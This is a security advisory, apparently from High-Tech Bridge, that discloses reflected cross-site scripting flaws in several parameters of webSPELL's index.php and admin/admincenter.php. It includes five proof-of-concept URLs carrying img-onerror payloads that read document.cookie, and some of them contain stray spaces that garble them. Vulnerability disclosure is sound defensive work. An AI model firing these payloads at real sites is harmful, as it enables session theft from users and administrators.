Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in webSPELL which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerability in webSPELL
1.1 The vulnerability exists due to input sanitation error in the "pass" and "touser" parameters in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation examples:
http://[host]/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20one rror=alert%28document.co okie%29%3E
http://[host]/index.php?site=messenger&action=touser&touser=1% 22%3E%3Cimg%20src=1.png%20 onerror=alert%28document.cookie%29%3E

1.2 The vulnerability exists due to input sanitation error in the "page", "squadID" and "contactID" parameters in admin/admincenter.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation examples:
http://[host]/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1% 22%3E%3Cimg%20src=1.png% 20onerror=alert%28document.cookie%29%3E
http://[host]/admin/admincenter.p hp?site=squads&action=edit &squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E

http://[host]/admin/admi ncenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20o nerror=alert%28document. cookie%29%3E
